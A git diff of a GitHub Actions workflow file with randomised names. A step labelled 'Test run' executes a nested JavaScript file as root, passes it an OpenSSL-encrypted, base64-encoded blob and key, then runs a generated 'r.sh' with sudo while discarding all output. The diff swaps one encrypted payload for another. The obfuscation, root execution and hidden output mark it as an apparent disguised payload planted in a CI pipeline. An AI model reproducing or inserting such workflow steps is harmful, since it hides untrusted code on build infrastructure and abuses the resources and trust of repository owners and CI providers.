--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'tobv2'
+        echo 'ipw1m'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+zZQlwuBiiKXPkeWrmI+CSouCzLN5o36uOlkBfzwMGiIE7nIKaVnPH8OtXAISy4USpt46kdJXPFuLG8XJAwiPgVotH+I0kEFBHToyJ+CNqk0dE7nnZptx+ nll4iy && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18PyyTQSTXaU4jgMxP9g0I101/9y7UxGiJsp09lo5pidNYl+keUsnv5e5AlCmCdA3l8eyFDcjWrMDw+A6/S2Zb7bbX7oZ+fz6zbptcRAql2GH8BEnSV4dcO sslcpt && sudo sh r.sh > /dev/null 2>&1
